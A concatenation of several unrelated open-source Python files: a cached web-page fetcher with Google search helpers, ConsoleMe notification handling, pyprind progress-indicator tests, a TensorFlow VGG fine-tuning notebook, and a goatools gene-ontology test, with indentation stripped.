def get_hashcode(self, url):
return hashlib.sha1(url).hexdigest()
def get_path(self, url, already_hashed=False):
if not already_hashed:
url = self.get_hashcode(url)
return os.path.join(self.cachePath, url)
def get_current_datetime(self):
return time.strftime("%Y-%m-%d-%H-%M-%S", time.gmtime())
def open_in_browser(self, hashcode, browser="firefox"):
path = os.path.join(self.cachePath, hashcode)
subprocess.call([browser, path])
def comment(self, url):
return ' '.join(('<!--', urllib.quote(url),
self.get_current_datetime(), '-->\n'))
def read(self, url, already_hashed=False):
path = self.get_path(url, already_hashed)
if os.path.exists(path):
with open(path) as fin:
error = False
check_url = fin.readline().strip()
if check_url == 'ERROR':
error = True
error_message = fin.readline().strip()
check_url = fin.readline()
if not already_hashed:
tokens = check_url.split()
assert len(tokens) > 2 and tokens[1] == urllib.quote(url), path
if error:
return WebLoadingError(error_message)
else:
return fin.read()
def write(self, url, content, already_hashed=False):
path = self.get_path(url, already_hashed)
with open(path, 'w') as fout:
fout.write(self.comment(url))
fout.write(content)
def write_error(self, url, error, already_hashed=False):
path = self.get_path(url, already_hashed)
with open(path, 'w') as fout:
fout.write('ERROR\n')
fout.write(error.replace('\n', ' ') + '\n')
fout.write(self.comment(url))
def get_page(self, url, force=False, check_html=True):
result = self.read(url)
if result and not force:
self.cache_miss = False
if isinstance(result, WebLoadingError):
if self.log:
print >> sys.stderr, '[ERROR]', result
result = None
else:
self.cache_miss = True
try:
if self.log:
print >> sys.stderr, 'Downloading from', url, '...'
# Check blacklist
parsed_url = urlparse.urlparse(url)
if parsed_url.netloc in BLACKLIST:
raise WebLoadingError('URL %s in blacklist' % url)
# Open web page
opener = urllib2.build_opener()
opener.addheaders = [
('User-agent',
'Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0)')]
response = opener.open(url, timeout=self.timeout)
# Check content type to prevent non-HTML
content_type = response.info().type
if check_html and content_type != 'text/html':
raise WebLoadingError("Non-HTML response: %s" %
content_type)
result = response.read()
self.write(url, result)
except Exception, e:
if self.log:
print >> sys.stderr, '[ERROR] ', e
if isinstance(e, (WebLoadingError, urllib2.URLError, socket.error)):
self.write_error(url, str(e.message))
result = None
if self.log:
if self.cache_miss:
print >> sys.stderr, 'Retrieved "%s"' % url
else:
print >> sys.stderr, ('Loaded "%s" from cache (%s)' %
(url, self.get_path(url)))
return result
################################################################
# GOOGLE SUGGEST
GOOGLE_SUGGEST_URL = 'http://suggestqueries.google.com/complete/search?client=firefox&q='
def get_google_suggest_url(self, before, after=''):
answer = self.GOOGLE_SUGGEST_URL + urllib.quote(before) + urllib.quote(after)
if after:
answer += '&cp=' + str(len(before))
return answer
def get_from_google_suggest(self, before, after=''):
url = self.get_google_suggest_url(before, after)
return json.loads(self.get_page(url, check_html=False))[1]
################################################################
# GOOGLE SEARCH -- old API
# The important fields of each result are
# - url (+ unescapedUrl, visibleUrl, cacheUrl)
# - titleNoFormatting (+ title)
# - content
GOOGLE_SEARCH_URL = 'http://ajax.googleapis.com/ajax/services/search/web?v=1.0&rsz=large&q='
def get_google_search_url(self, keyword):
answer = self.GOOGLE_SEARCH_URL + urllib.quote(keyword)
return answer
def get_from_google_search(self, keyword, raw=False):
url = self.get_google_search_url(keyword)
result = self.get_page(url, check_html=False)
if raw:
return result
return json.loads(result)
def get_urls_from_google_search(self, keyword):
results = self.get_from_google_search(keyword)['responseData']['results']
return [(x['unescapedUrl'], x['titleNoFormatting']) for x in results]
GOOGLE_PAUSE = 30
def get_from_google_search_with_backoff(self, keyword):
url = self.get_google_search_url(keyword)
result = self.get_page(url, check_html=False)
while True:
try:
return json.loads(result)['responseData']['results']
except:
# Google nailed me! Exponential backoff!
print >> sys.stderr, ('Hide from Google for %d seconds ...' %
WebpageCache.GOOGLE_PAUSE)
time.sleep(WebpageCache.GOOGLE_PAUSE)
WebpageCache.GOOGLE_PAUSE *= 2
result = self.get_page(url, check_html=False, force=True)
def get_urls_from_google_search_with_backoff(self, keyword):
results = self.get_from_google_search_with_backoff(keyword)
return [(x['unescapedUrl'], x['titleNoFormatting']) for x in results]
################################################################
# GOOGLE SEARCH -- Custom Search
CUSTOM_GOOGLE_SEARCH_URL = 'https://www.googleapis.com/customsearch/'\
'v1?key=%s&cx=%s&alt=json&safe=high&q=%s'
def set_google_custom_search_keys(self, api_key, cx):
self.api_key = api_key
self.cx = cx
def get_google_custom_search_url(self, keyword):
answer = self.CUSTOM_GOOGLE_SEARCH_URL % \
(self.api_key, self.cx, urllib.quote(keyword))
return answer
def get_from_google_custom_search(self, keyword, raw=False):
url = self.get_google_custom_search_url(keyword)
answer = self.get_page(url, check_html=False)
if raw:
return answer
return json.loads(answer)
def get_urls_from_google_custom_search(self, keyword):
results = self.get_from_google_custom_search(keyword)['items']
return [(x['link'], x.get('title', '')) for x in results]
def get_urls_from_google_hybrid_search(self, keyword):
'''Return (cache_path, results)'''
old_url = self.get_google_search_url(keyword)
result = self.read(old_url)
if result and not isinstance(result, WebLoadingError):
# Found result in cache
try:
results = json.loads(result)['responseData']['results']
return (self.get_path(old_url),
[(x['unescapedUrl'], x['titleNoFormatting'])
for x in results])
except:
# Stale bad cache ...
pass
# Use Custom search
return (self.get_path(self.get_google_custom_search_url(keyword)),
self.get_urls_from_google_custom_search(keyword))
class WebLoadingError(Exception):
def __init__(self, msg):
self.args = (msg,)
self.msg = msg
self.message = msg
|
src/anyconfig/ioinfo/constants.py | ssato/python-anyconfig | 213 | 12795551 | #
# Copyright (C) 2018 - 2021 <NAME> <<EMAIL>>
# SPDX-License-Identifier: MIT
#
r"""ioinfo.constants to provide global constant variables.
"""
import os.path
GLOB_MARKER: str = '*'
PATH_SEP: str = os.path.sep
# vim:sw=4:ts=4:et:
|
consoleme/lib/v2/notifications.py | shyovn/consoleme | 2,835 | 12795584 | <gh_stars>1000+
import json as original_json
import sys
import time
from collections import defaultdict
from typing import Dict
import sentry_sdk
import ujson as json
from asgiref.sync import sync_to_async
from consoleme.config import config
from consoleme.lib.cache import (
retrieve_json_data_from_redis_or_s3,
store_json_results_in_redis_and_s3,
)
from consoleme.lib.dynamo import UserDynamoHandler
from consoleme.lib.json_encoder import SetEncoder
from consoleme.lib.notifications.models import (
ConsoleMeUserNotification,
GetNotificationsForUserResponse,
)
from consoleme.lib.singleton import Singleton
log = config.get_logger()
class RetrieveNotifications(metaclass=Singleton):
def __init__(self):
self.last_update = 0
self.all_notifications = []
async def retrieve_all_notifications(self, force_refresh=False):
if force_refresh or (
int(time.time()) - self.last_update
> config.get(
"get_notifications_for_user.notification_retrieval_interval", 20
)
):
self.all_notifications = await retrieve_json_data_from_redis_or_s3(
redis_key=config.get("notifications.redis_key", "ALL_NOTIFICATIONS"),
redis_data_type="hash",
s3_bucket=config.get("notifications.s3.bucket"),
s3_key=config.get(
"notifications.s3.key", "notifications/all_notifications_v1.json.gz"
),
default={},
)
self.last_update = int(time.time())
return self.all_notifications
async def get_notifications_for_user(
user,
groups,
max_notifications=config.get("get_notifications_for_user.max_notifications", 5),
force_refresh=False,
) -> GetNotificationsForUserResponse:
function = f"{__name__}.{sys._getframe().f_code.co_name}"
log_data = {
"function": function,
"user": user,
"max_notifications": max_notifications,
"force_refresh": force_refresh,
}
current_time = int(time.time())
all_notifications = await RetrieveNotifications().retrieve_all_notifications(
force_refresh
)
unread_count = 0
notifications_for_user = []
for user_or_group in [user, *groups]:
# Filter out identical notifications that were already captured via user-specific attribution. IE: "UserA"
# performed an access deny operation locally under "RoleA" with session name = "UserA", so the generated
# notification is tied to the user. However, "UserA" is a member of "GroupA", which owns RoleA. We want
# to show the notification to members of "GroupA", as well as "UserA" but we don't want "UserA" to see 2
# notifications.
notifications = all_notifications.get(user_or_group)
if not notifications:
continue
notifications = json.loads(notifications)
for notification_raw in notifications:
try:
# We parse ConsoleMeUserNotification individually instead of as an array
# to account for future changes to the model that may invalidate older
# notifications
notification = ConsoleMeUserNotification.parse_obj(notification_raw)
except Exception as e:
log.error({**log_data, "error": str(e)})
sentry_sdk.capture_exception()
continue
if notification.version != 1:
# Skip unsupported versions of the notification model
continue
if user in notification.hidden_for_users:
# Skip this notification if it isn't hidden for the user
continue
seen = False
for existing_user_notification_raw in notifications_for_user:
existing_user_notification = ConsoleMeUserNotification.parse_obj(
existing_user_notification_raw
)
if (
notification.predictable_id
== existing_user_notification.predictable_id
):
seen = True
if not seen:
notifications_for_user.append(notification)
# Filter out "expired" notifications
notifications_for_user = [
v for v in notifications_for_user if v.expiration > current_time
]
# Show newest notifications first
notifications_for_user = sorted(
notifications_for_user, key=lambda i: i.event_time, reverse=True
)
# Increment Unread Count
notifications_to_return = notifications_for_user[0:max_notifications]
for notification in notifications_to_return:
if user in notification.read_by_users or notification.read_by_all:
notification.read_for_current_user = True
continue
unread_count += 1
return GetNotificationsForUserResponse(
notifications=notifications_to_return, unread_count=unread_count
)
async def fetch_notification(notification_id: str):
ddb = UserDynamoHandler()
notification = await sync_to_async(ddb.notifications_table.get_item)(
Key={"predictable_id": notification_id}
)
if notification.get("Item"):
return ConsoleMeUserNotification.parse_obj(notification["Item"])
async def cache_notifications_to_redis_s3() -> Dict[str, int]:
function = f"{__name__}.{sys._getframe().f_code.co_name}"
current_time = int(time.time())
log_data = {"function": function}
ddb = UserDynamoHandler()
notifications_by_user_group = defaultdict(list)
all_notifications_l = await ddb.parallel_scan_table_async(ddb.notifications_table)
changed_notifications = []
for existing_notification in all_notifications_l:
notification = ConsoleMeUserNotification.parse_obj(existing_notification)
if current_time > notification.expiration:
notification.expired = True
changed_notifications.append(notification.dict())
for user_or_group in notification.users_or_groups:
notifications_by_user_group[user_or_group].append(notification.dict())
if changed_notifications:
ddb.parallel_write_table(ddb.notifications_table, changed_notifications)
if notifications_by_user_group:
for k, v in notifications_by_user_group.items():
notifications_by_user_group[k] = original_json.dumps(v, cls=SetEncoder)
await store_json_results_in_redis_and_s3(
notifications_by_user_group,
redis_key=config.get("notifications.redis_key", "ALL_NOTIFICATIONS"),
redis_data_type="hash",
s3_bucket=config.get("notifications.s3.bucket"),
s3_key=config.get(
"notifications.s3.key", "notifications/all_notifications_v1.json.gz"
),
)
log_data["num_user_groups_for_notifications"] = len(
notifications_by_user_group.keys()
)
log_data["num_notifications"] = len(all_notifications_l)
log.debug(log_data)
return {
"num_user_groups_to_notify": len(notifications_by_user_group.keys()),
"num_notifications": len(all_notifications_l),
}
async def write_notification(notification: ConsoleMeUserNotification):
ddb = UserDynamoHandler()
await sync_to_async(ddb.notifications_table.put_item)(
Item=ddb._data_to_dynamo_replace(notification.dict())
)
await cache_notifications_to_redis_s3()
return True
|
tests/test_percentage_indicator.py | tahmidbintaslim/pyprind | 411 | 12795637 | """
<NAME> 2014-2016
Python Progress Indicator Utility
Author: <NAME> <<EMAIL>>
License: BSD 3 clause
Contributors: https://github.com/rasbt/pyprind/graphs/contributors
Code Repository: https://github.com/rasbt/pyprind
PyPI: https://pypi.python.org/pypi/PyPrind
"""
import sys
import time
import pyprind
n = 100
sleeptime = 0.02
def test_basic_percent():
perc = pyprind.ProgPercent(n)
for i in range(n):
time.sleep(sleeptime)
perc.update()
def test_stdout():
perc = pyprind.ProgPercent(n, stream=sys.stdout)
for i in range(n):
time.sleep(sleeptime)
perc.update()
def test_generator():
for i in pyprind.prog_percent(range(n), stream=sys.stdout):
time.sleep(sleeptime)
def test_monitoring():
perc = pyprind.ProgPercent(n, monitor=True)
for i in range(n):
time.sleep(sleeptime)
perc.update()
print(perc)
def test_item_tracking():
items = ['file_%s.csv' % i for i in range(0, n)]
perc = pyprind.ProgPercent(len(items))
for i in items:
time.sleep(sleeptime)
perc.update(item_id=i)
def test_force_flush():
perc = pyprind.ProgPercent(n)
for i in range(n):
time.sleep(sleeptime)
perc.update(force_flush=True)
def test_update_interval():
perc = pyprind.ProgPercent(n, update_interval=4)
for i in range(n):
time.sleep(sleeptime)
perc.update()
if __name__ == "__main__":
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Basic Percentage Indicator\n')
test_basic_percent()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing stdout Stream\n')
test_stdout()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Percentage Indicator Generator\n')
test_generator()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing monitor function\n')
test_monitoring()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Item Tracking\n')
test_item_tracking()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Force Flush\n')
test_force_flush()
print('\n%s' % (80 * '='))
print('%s\n' % (80 * '='))
print('Testing Update Interval\n')
test_update_interval()
|
04_CNN_advances/use_vgg_finetune.py | jastarex/DL_Notes | 203 | 12795640 |
# coding: utf-8
# # 使用预训练的VGG模型Fine-tune CNN
# In[1]:
# Import packs
import numpy as np
import os
import scipy.io
from scipy.misc import imread, imresize
import matplotlib.pyplot as plt
import skimage.io
import skimage.transform
import tensorflow as tf
get_ipython().magic(u'matplotlib inline')
cwd = os.getcwd()
print ("Package loaded")
print ("Current folder is %s" % (cwd) )
# In[2]:
# 下载预先训练好的vgg-19模型,为Matlab的.mat格式,之后会用scipy读取
# (注意此版本模型与此处http://www.vlfeat.org/matconvnet/pretrained/最新版本不同)
import os.path
if not os.path.isfile('./data/imagenet-vgg-verydeep-19.mat'):
get_ipython().system(u'wget -O data/imagenet-vgg-verydeep-19.mat http://www.vlfeat.org/matconvnet/models/beta16/imagenet-vgg-verydeep-19.mat')
# # 载入图像,调节尺寸,生成数据集
# In[3]:
# Configure the locations of the images and reshaping sizes
# ------------------------------------------------------------------- #
paths = {"images/cats", "images/dogs"}
imgsize = [64, 64] # The reshape size
use_gray = 0 # Grayscale
data_name = "data4vgg" # Save name
valid_exts = [".jpg",".gif",".png",".tga", ".jpeg"]
# ------------------------------------------------------------------- #
imgcnt = 0
nclass = len(paths)
for relpath in paths:
fullpath = cwd + "/" + relpath
flist = os.listdir(fullpath)
for f in flist:
if os.path.splitext(f)[1].lower() not in valid_exts:
continue
fullpath = os.path.join(fullpath, f)
imgcnt = imgcnt + 1
# Grayscale
def rgb2gray(rgb):
if len(rgb.shape) is 3:
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
else:
print ("Current Image is GRAY!")
return rgb
if use_gray:
totalimg = np.ndarray((imgcnt, imgsize[0]*imgsize[1]))
else:
totalimg = np.ndarray((imgcnt, imgsize[0]*imgsize[1]*3))
totallabel = np.ndarray((imgcnt, nclass))
imgcnt = 0
for i, relpath in zip(range(nclass), paths):
path = cwd + "/" + relpath
flist = os.listdir(path)
for f in flist:
if os.path.splitext(f)[1].lower() not in valid_exts:
continue
fullpath = os.path.join(path, f)
currimg = imread(fullpath)
# Convert to grayscale
if use_gray:
grayimg = rgb2gray(currimg)
else:
grayimg = currimg
# Reshape
graysmall = imresize(grayimg, [imgsize[0], imgsize[1]])/255.
grayvec = np.reshape(graysmall, (1, -1))
# Save
totalimg[imgcnt, :] = grayvec
totallabel[imgcnt, :] = np.eye(nclass, nclass)[i]
imgcnt = imgcnt + 1
# Divide total data into training and test set
randidx = np.random.randint(imgcnt, size=imgcnt)
trainidx = randidx[0:int(4*imgcnt/5)]
testidx = randidx[int(4*imgcnt/5):imgcnt]
trainimg = totalimg[trainidx, :]
trainlabel = totallabel[trainidx, :]
testimg = totalimg[testidx, :]
testlabel = totallabel[testidx, :]
ntrain = trainimg.shape[0]
nclass = trainlabel.shape[1]
dim = trainimg.shape[1]
ntest = testimg.shape[0]
print ("Number of total images is %d (train: %d, test: %d)"
% (imgcnt, ntrain, ntest))
print ("Shape of an image is (%d, %d, %d)" % (imgsize[0], imgsize[1], 3))
# # 定义VGG网络结构
# In[4]:
def net(data_path, input_image):
layers = (
'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',
'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',
'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',
'relu3_3', 'conv3_4', 'relu3_4', 'pool3',
'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',
'relu4_3', 'conv4_4', 'relu4_4', 'pool4',
'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',
'relu5_3', 'conv5_4', 'relu5_4'
)
data = scipy.io.loadmat(data_path)
mean = data['normalization'][0][0][0]
mean_pixel = np.mean(mean, axis=(0, 1))
weights = data['layers'][0]
net = {}
current = input_image
for i, name in enumerate(layers):
kind = name[:4]
if kind == 'conv':
kernels, bias = weights[i][0][0][0][0]
# matconvnet: weights are [width, height, in_channels, out_channels]
# tensorflow: weights are [height, width, in_channels, out_channels]
kernels = np.transpose(kernels, (1, 0, 2, 3))
bias = bias.reshape(-1)
current = _conv_layer(current, kernels, bias)
elif kind == 'relu':
current = tf.nn.relu(current)
elif kind == 'pool':
current = _pool_layer(current)
net[name] = current
assert len(net) == len(layers)
return net, mean_pixel
def _conv_layer(input, weights, bias):
conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),
padding='SAME')
return tf.nn.bias_add(conv, bias)
def _pool_layer(input):
return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),
padding='SAME')
def preprocess(image, mean_pixel):
return image - mean_pixel
def unprocess(image, mean_pixel):
return image + mean_pixel
print ("VGG net ready")
# # 使用VGG计算卷积特征图
# In[5]:
# Preprocess
trainimg_tensor = np.ndarray((ntrain, imgsize[0], imgsize[1], 3))
testimg_tensor = np.ndarray((ntest, imgsize[0], imgsize[1], 3))
for i in range(ntrain):
currimg = trainimg[i, :]
currimg = np.reshape(currimg, [imgsize[0], imgsize[1], 3])
trainimg_tensor[i, :, :, :] = currimg
print ("Shape of trainimg_tensor is %s" % (trainimg_tensor.shape,))
for i in range(ntest):
currimg = testimg[i, :]
currimg = np.reshape(currimg, [imgsize[0], imgsize[1], 3])
testimg_tensor[i, :, :, :] = currimg
print ("Shape of trainimg_tensor is %s" % (testimg_tensor.shape,))
# Get conv features
VGG_PATH = cwd + "/data/imagenet-vgg-verydeep-19.mat"
with tf.Graph().as_default(), tf.Session() as sess:
with tf.device("/cpu:0"):
img_placeholder = tf.placeholder(tf.float32
, shape=(None, imgsize[0], imgsize[1], 3))
nets, mean_pixel = net(VGG_PATH, img_placeholder)
train_features = nets['relu5_4'].eval(feed_dict={img_placeholder: trainimg_tensor})
test_features = nets['relu5_4'].eval(feed_dict={img_placeholder: testimg_tensor})
print("Convolutional map extraction done")
# # 卷积特征图的形状
# In[6]:
print ("Shape of 'train_features' is %s" % (train_features.shape,))
print ("Shape of 'test_features' is %s" % (test_features.shape,))
# # 向量化
# In[7]:
# Vectorize
train_vectorized = np.ndarray((ntrain, 4*4*512))
test_vectorized = np.ndarray((ntest, 4*4*512))
for i in range(ntrain):
curr_feat = train_features[i, :, :, :]
curr_feat_vec = np.reshape(curr_feat, (1, -1))
train_vectorized[i, :] = curr_feat_vec
for i in range(ntest):
curr_feat = test_features[i, :, :, :]
curr_feat_vec = np.reshape(curr_feat, (1, -1))
test_vectorized[i, :] = curr_feat_vec
print ("Shape of 'train_vectorized' is %s" % (train_features.shape,))
print ("Shape of 'test_vectorized' is %s" % (test_features.shape,))
# # 定义finetuning的结构
# In[8]:
# Parameters
learning_rate = 0.0001
training_epochs = 100
batch_size = 100
display_step = 10
# tf Graph input
x = tf.placeholder(tf.float32, [None, 4*4*512])
y = tf.placeholder(tf.float32, [None, nclass])
keepratio = tf.placeholder(tf.float32)
# Network
with tf.device("/cpu:0"):
n_input = dim
n_output = nclass
weights = {
'wd1': tf.Variable(tf.random_normal([4*4*512, 1024], stddev=0.1)),
'wd2': tf.Variable(tf.random_normal([1024, n_output], stddev=0.1))
}
biases = {
'bd1': tf.Variable(tf.random_normal([1024], stddev=0.1)),
'bd2': tf.Variable(tf.random_normal([n_output], stddev=0.1))
}
def conv_basic(_input, _w, _b, _keepratio):
# Input
_input_r = _input
# Vectorize
_dense1 = tf.reshape(_input_r, [-1, _w['wd1'].get_shape().as_list()[0]])
# Fc1
_fc1 = tf.nn.relu(tf.add(tf.matmul(_dense1, _w['wd1']), _b['bd1']))
_fc_dr1 = tf.nn.dropout(_fc1, _keepratio)
# Fc2
_out = tf.add(tf.matmul(_fc_dr1, _w['wd2']), _b['bd2'])
# Return everything
out = {'input_r': _input_r, 'dense1': _dense1,
'fc1': _fc1, 'fc_dr1': _fc_dr1, 'out': _out }
return out
# Functions!
_pred = conv_basic(x, weights, biases, keepratio)['out']
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=_pred, labels=y))
optm = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
_corr = tf.equal(tf.argmax(_pred,1), tf.argmax(y,1))
accr = tf.reduce_mean(tf.cast(_corr, tf.float32))
init = tf.initialize_all_variables()
print ("Network Ready to Go!")
# # 优化
# In[9]:
# Launch the graph
sess = tf.Session()
sess.run(init)
# Training cycle
for epoch in range(training_epochs):
avg_cost = 0.
num_batch = int(ntrain/batch_size)+1
# Loop over all batches
for i in range(num_batch):
randidx = np.random.randint(ntrain, size=batch_size)
batch_xs = train_vectorized[randidx, :]
batch_ys = trainlabel[randidx, :]
# Fit training using batch data
sess.run(optm, feed_dict={x: batch_xs, y: batch_ys, keepratio:0.7})
# Compute average loss
avg_cost += sess.run(cost, feed_dict={x: batch_xs, y: batch_ys, keepratio:1.})/num_batch
# Display logs per epoch step
if epoch % display_step == 0:
print ("Epoch: %03d/%03d cost: %.9f" % (epoch, training_epochs, avg_cost))
train_acc = sess.run(accr, feed_dict={x: batch_xs, y: batch_ys, keepratio:1.})
print (" Training accuracy: %.3f" % (train_acc))
test_acc = sess.run(accr, feed_dict={x: test_vectorized, y: testlabel, keepratio:1.})
print (" Test accuracy: %.3f" % (test_acc))
print ("Optimization Finished!")
|
tests/test_gosubdag_relationships_i126.py | flying-sheep/goatools | 477 | 12795691 | #!/usr/bin/env python
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# tests/test_gosubdag_relationships_i126.py
# goatools/gosubdag/gosubdag.py
# goatools/gosubdag/godag_rcnt.py
# goatools/gosubdag/godag_rcnt_init.py
# goatools/godag/go_tasks.py
# goatools/obo_parser.py
from __future__ import print_function
__copyright__ = "Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved."
from os.path import join
from os import system
import sys
## import timeit
## import datetime
import collections as cx
from goatools.base import get_godag
from goatools.godag.consts import RELATIONSHIP_SET
from goatools.gosubdag.gosubdag import GoSubDag
from goatools.test_data.wr_subobo import WrSubObo
from tests.utils import REPO
# pylint: disable=line-too-long,unused-variable
def test_gosubdag_relationships(wr_new_obo_subset=False):
"""Test that GoSubDag contains ancestors from only the user-specified relationships"""
# Leaf GO: viral triggering of virus induced gene silencing
goid_chosen = 'GO:0060150'
# Load GODag with all relationships
fin_obo = join(REPO, "tests/data/i126/viral_gene_silence.obo") # "go-basic.obo")
godag_r0 = get_godag(fin_obo, loading_bar=None)
godag_r1 = get_godag(fin_obo, loading_bar=None, optional_attrs=['relationship'])
file_sub = join(REPO, "tests/data/viral_gene_silence.obo")
# Get all GO terms above this low-level GO ID using all relationships
if wr_new_obo_subset:
_wr_sub_obo(file_sub, goid_chosen, godag_r1, fin_obo)
# RELATIONSHIPS: None
gosubdag_r0 = GoSubDag(set([goid_chosen]), godag_r0)
assert len(gosubdag_r0.rcntobj.go2ancestors[goid_chosen]) == 12
# RELATIONSHIPS: ALL
gosubdag_r1 = GoSubDag(set([goid_chosen]), godag_r1, relationships=True)
assert gosubdag_r1.relationships == RELATIONSHIP_SET
#### set(['part_of', 'regulates', 'positively_regulates', 'negatively_regulates'])
assert len(gosubdag_r1.rcntobj.go2ancestors[goid_chosen]) == 50
# RELATIONSHIPS: part_of
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'})
assert gosubdag_rp.relationships == set(['part_of'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: regulates
gosubdag_rr = GoSubDag(set([goid_chosen]), godag_r1, relationships={'regulates'})
assert gosubdag_rr.relationships == set(['regulates'])
rp_par = gosubdag_rr.rcntobj.go2ancestors[goid_chosen]
# assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj'
# assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents'
# RELATIONSHIPS: positively_regulates
gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'positively_regulates'})
assert gosubdag_rp.relationships == set(['positively_regulates'])
rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: negatively_regulates
gosubdag_rn = GoSubDag(set([goid_chosen]), godag_r1, relationships={'negatively_regulates'})
assert gosubdag_rn.relationships == set(['negatively_regulates'])
rp_par = gosubdag_rn.rcntobj.go2ancestors[goid_chosen]
# RELATIONSHIPS: regulates positively_regulates negatively_regulates
regs = {'positively_regulates', 'negatively_regulates'}
gosubdag_rnp = GoSubDag(set([goid_chosen]), godag_r1, relationships=regs)
assert gosubdag_rnp.relationships == regs
rp_par = gosubdag_rnp.rcntobj.go2ancestors[goid_chosen]
_run_baseline_r0(gosubdag_r0, gosubdag_r1)
# BASELINE r1: Test that GOTerm.get_all_upper() is the same as GoSubDag ancestors
for goid, term in gosubdag_r1.go2obj.items():
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r1 == term.get_all_upper()
#### # Test that
#### gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'}, prt=sys.stdout)
#### for goid, dag_term in godag_r1.items():
#### if goid in gosubdag_r1.rcntobj.go2ancestors:
#### ancestors = gosubdag_rp.rcntobj.go2ancestors[goid]
#### sub_term = gosubdag_rp.go2obj[goid]
#### reldict = sub_term.relationship.items()
#### # print(goid)
#### # print('DAG', sorted(dag_term.get_all_upper()))
#### # print('SUB', sorted(sub_term.get_all_upper()))
#### # print('ANS', sorted(ancestors))
#### # for rel, pterms in cx.OrderedDict(reldict).items():
#### # print(rel, ' '.join(sorted(o.id for o in pterms)))
#### # print('')
#### print(gosubdag_rp.relationships)
#### #assert 'GO:0016441' not in gosubdag_rp.rcntobj.go2ancestors['GO:0060150']
#### assert 'GO:0016441' in gosubdag_r1.go2nt
#### assert 'GO:0010467' in gosubdag_r1.go2nt
def _run_baseline_r0(gosubdag_r0, gosubdag_r1):
"""BASELINE r0: Test that GOTerm.get_all_parents() == GoSubDag ancestors"""
r1_ancestors_more = set()
# Loop through r0 GO IDs
for goid, term in gosubdag_r0.go2obj.items():
ancestors_r0 = gosubdag_r0.rcntobj.go2ancestors.get(goid, set())
ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set())
assert ancestors_r0 == term.get_all_parents()
assert ancestors_r0.issubset(ancestors_r1)
if len(ancestors_r0) < len(ancestors_r1):
r1_ancestors_more.add(goid)
assert r1_ancestors_more
print('{N} r1 GO terms in GoSubDag have more ancestors than r0'.format(
N=len(r1_ancestors_more)))
# scripts/go_plot.py --go_file=i126_goids_baseline.txt -r --obo=tests/data/viral_gene_silence.obo -o i126_goids_baseline.png
fout_gos = 'i126_goids_baseline.txt'
with open(fout_gos, 'w') as prt:
prt.write('#cafffb {SRC_GO}\n'.format(SRC_GO=next(iter(gosubdag_r0.go_sources))))
_prt_goterms(r1_ancestors_more, gosubdag_r1.go2nt, prt)
print(' WROTE: {GOs}'.format(GOs=fout_gos))
def _prt_goterms(goids, go2nt, prt):
"""Print details of GO terms"""
fmt = ('#ffd1df {GO} # {NS} {dcnt:5} {childcnt:3} '
'L{level:02} D{depth:02} R{reldepth:02} {D1:5} {REL} {rel} {GO_name}\n')
nts = [nt for go, nt in go2nt.items() if go in goids]
for ntd in sorted(nts, key=lambda nt: nt.dcnt, reverse=True):
prt.write(fmt.format(**ntd._asdict()))
#cafffb GO:0060150
#ffd1df GO:0050794 # BP 8278 64 D03 R03 regulation of cellular process
#ffd1df GO:0019222 # BP 3382 20 D03 R03 regulation of metabolic process
#ffd1df GO:0048522 # BP 2417 65 D04 R04 positive regulation of cellular process
#ffd1df GO:0060255 # BP 2130 20 D04 R04 regulation of macromolecule metabolic process
#ffd1df GO:0010468 # BP 862 20 D05 R05 regulation of gene expression
#ffd1df GO:0060968 # BP 53 4 D06 R08 regulation of gene silencing
#ffd1df GO:0060147 # BP 24 4 D07 R09 regulation of posttranscriptional gene silencing
#ffd1df GO:0060148 # BP 8 3 D08 R10 positive regulation of posttranscriptional gene silencing
#ffd1df GO:0060150 # BP 0 0 D09 R11 viral triggering of virus induced gene silencing
# - Generate GO DAG subset for this test ---------------------------------------------------------
def _wr_sub_obo(fout_obo, goid_chosen, godag_r1, fin_obo):
"""Sub plot used for visualizing this test file's elements"""
# Load GO-DAG: Load optional 'relationship'
godag = {go:o for go, o in godag_r1.items() if go == o.item_id}
_prt_rtel_ctr(godag)
rels_all = set(['part_of', 'regulates', 'negatively_regulates', 'positively_regulates'])
goids_leaf_all = set(o.id for o in godag.values() if not o.children)
gosubdag_r1 = GoSubDag(goids_leaf_all, godag, relationships=True, prt=sys.stdout)
goids_src_r1_all = _get_leafs_w_relsinhier(rels_all, gosubdag_r1)
gosubdag_r1.prt_goids(goids_src_r1_all)
# Pick one of the GO IDs as a source for the subset DAG
